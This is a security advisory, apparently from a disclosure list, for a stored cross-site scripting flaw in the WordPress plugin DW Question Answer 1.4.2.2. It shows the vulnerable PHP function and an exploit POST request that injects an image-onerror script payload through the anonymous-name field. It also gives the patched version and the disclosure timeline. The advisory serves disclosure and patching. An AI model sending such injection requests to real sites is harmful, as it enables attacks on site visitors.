----------------------------------------
Description:
----------------------------------------
"_dwqa_anonymous_name" parameter is not sanitized that leads to Stored XSS.
Vulnerability Disclosure Timeline:
â?? March 3, 2016 â?? Bug discovered, initial report to WordPress
â?? March 7, 2016 â?? No response, Report sent again.
â?? March 8, 2016 â?? WordPress response, plugin taken down
â?? March 11, 2016 â?? Vendor deployed a patch
#Product : DW Question Answer
#Exploit Author : Rahul Pratap Singh
#Version : 1.4.2.2
#Home page Link : https://wordpress.org/plugins/dw-question-answer/
#Website : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Date : 11/3/2016
XSS Vulnerability:
----------------------------------------
Description:
----------------------------------------
"_dwqa_anonymous_name" parameter is not sanitized that leads to Stored XSS.
----------------------------------------
Vulnerable Code:
----------------------------------------
User.php
function dwqa_get_author( $post_id = false ) {
if ( !$post_id ) {
$post_id = get_the_ID();
}
$display_name = false;
if ( dwqa_is_anonymous( $post_id ) ) {
$anonymous_name = get_post_meta( $post_id, '_dwqa_anonymous_name', true );
if ( $anonymous_name ) {
$display_name = $anonymous_name;
} else {
$display_name = __( 'Anonymous', 'dwqa' );
}
} else {
$user_id = get_post_field( 'post_author', $post_id );
$display_name = get_the_author_meta( 'display_name', $user_id );
}
return apply_filters( 'dwqa_get_author', $display_name, $post_id );
}
----------------------------------------
Exploit:
----------------------------------------
POST /index.php/dwqa-ask-question/ HTTP/1.1
question-title=abc&question-content=%3Cp%3Eabc%3C%2Fp%3E&question-catego
ry=2&question-tag=abc&_dwqa_anonymous_email=
abc%40gmail.com&_dwqa_anonymous_name=%22%3E%3Cimg+src%3Dx+
onerror%3Dalert%281%29%3E%3C%21--&_wpnonce=
3164a8f439&_wp_http_referer=%2Fwp442%2Findex.php%2Fdwqa-ask-question%2F&
dwqa-question-submit=Submit
----------------------------------------
POC:
----------------------------------------
https://0x62626262.files.wordpress.com/2016/03/dwqa_stored_xss.png
Fix:
Update to 1.4.2.3
Vulnerability Disclosure Timeline:
â?? March 3, 2016 â?? Bug discovered, initial report to WordPress
â?? March 7, 2016 â?? No response, Report sent again.
â?? March 8, 2016 â?? WordPress response, plugin taken down
â?? March 11, 2016 â?? Vendor deployed a patch
#######################################
# CTG SECURITY SOLUTIONS #
# www.ctgsecuritysolutions.com #
#######################################
Pub Ref:
https://wordpress.org/plugins/dw-question-answer/changelog/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.22 (GNU/Linux)
iQIcBAEBAgAGBQJW4l9IAAoJEJvdRneaz31fWCMP/jOaUPzECruikc8/gRjRnXE3
+FPI9d6dIIE17k97yOt/MwK4JIyRgXp+31dIlpE/FMtY/Sje9Braz3xQDZbMo6MM
s4tFlQhWxECBGjafkck8Oc8jlcDKO+U1QsEMUI0pe/kdWUgcvcAXAsAc88CAOqu+
90NL+B4i/yaz+JSIhn25eRg68WsBjwKgAWu87ILwDpcoKCBnHUG2cCj9262rJDWM
p7yjM2Gd+wfSYKn5LzBRujPKjT3qaXULFpU65qllTBTc2XbV6r5TlZxUmZ0Aarud
eeaBJjmOradoAUklUOkbzYfL2hXGyGfcUtn+zxTlyLbXVyAPRL8jMIPHnHgHmuR9
J2OITWmwvnMEid4rghx+ToGcYhBYeZ7Ym3rML0iJq6JEi0s8EscEqZwMrdFdnXvw
TRh0MYmfbacu9GdEjCZUKDzuWzIkMzTn0J+C9cSoxtlzgqbnvpLJasg+c2HG/62d
GPNpih1mQ3gPFpw7rLbOPGR6O3whFxtnmyQWrIbfvMUU64znUpI0ds3XZpgWkqE0
Ax4OWvcGAbvEMt21iVf7++mRhP2qUo1zhskzFT2fy8OJXoNTMkgAlX1vNlZX5lRJ
TiOEIt76ghzECj28OoyGlSXA9ajWSA9+RBrTWG9bBGDaLYCO2N7xPK6c2/vRatOG
ng5Vg598n/I9BnuEqvn5
=0deH
-----END PGP SIGNATURE-----
[ reply ]